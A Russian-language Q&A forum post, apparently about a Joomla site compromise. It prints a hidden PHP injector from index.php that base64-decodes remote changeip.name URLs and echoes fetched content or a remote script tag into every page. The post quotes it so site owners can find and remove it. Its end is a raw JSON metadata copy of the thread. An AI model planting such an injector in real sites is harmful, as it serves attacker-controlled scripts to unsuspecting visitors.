Акылбек Калчаев

Ссылка-вирус на сайте ""

скриптом прописана в файле сайта index.php.
Ссылка-вирус на сайте выглядит так ""

А вот на сайте ее найти в таком виде нереально.
Ищите скрипт типа
"/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));
function sql2_safe($in) {
$rtn = base64_decode($in);
return $rtn;
}
function collectnewss() {
$get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==");
$content = @file_get_contents($get);
if (!$content)
echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
else
echo $content;
}
collectnewss ();
"
Это для Joomla сайтов.

Оксана Бучнева

это php код, он выполняется на сервере, в браузер выдается уже итог его выполнения. естественно там вы этого кода, как и ни какой другой части php когда не увидите.

\"","text":"скриптом прописана в файле сайта index.php. \nСсылка-вирус на сайте выглядит так \"\" \n \nА вот на сайте ее найти в таком виде нереально. \nИщите скрипт типа \n\"/** \n * RETURN THE RESPONSE \n */ \necho JResponse::toString($mainframe->getCfg('gzip')); \nfunction sql2_safe($in) { \n $rtn = base64_decode($in); \n return $rtn; \n} \nfunction collectnewss() { \n $get = sql2_safe(\"aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==\"); \n$content = @file_get_contents($get); \nif (!$content) \necho sql2_safe(\"PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=\"); \nelse \necho $content; \n} \ncollectnewss (); \n\" \nЭто для Joomla сайтов.","datePublished":"2013-02-15T07:02:46+00:00","answerCount":1,"upvoteCount":0,"author":{"@type":"Person","name":"Акылбек Калчаев","url":"https://sprashivalka.com/105127"},"acceptedAnswer":{"@type":"Answer","text":"это php код, он выполняется на сервере, в браузер выдается уже итог его выполнения. естественно там вы этого кода, как и ни какой другой части php когда не увидите.","datePublished":"2020-07-03T13:51:54+00:00","upvoteCount":0,"url":"https://sprashivalka.com/tqa/q/19045559#a34929014","author":{"@type":"Person","name":"Оксана Бучнева","url":"https://sprashivalka.com/106304"}}}}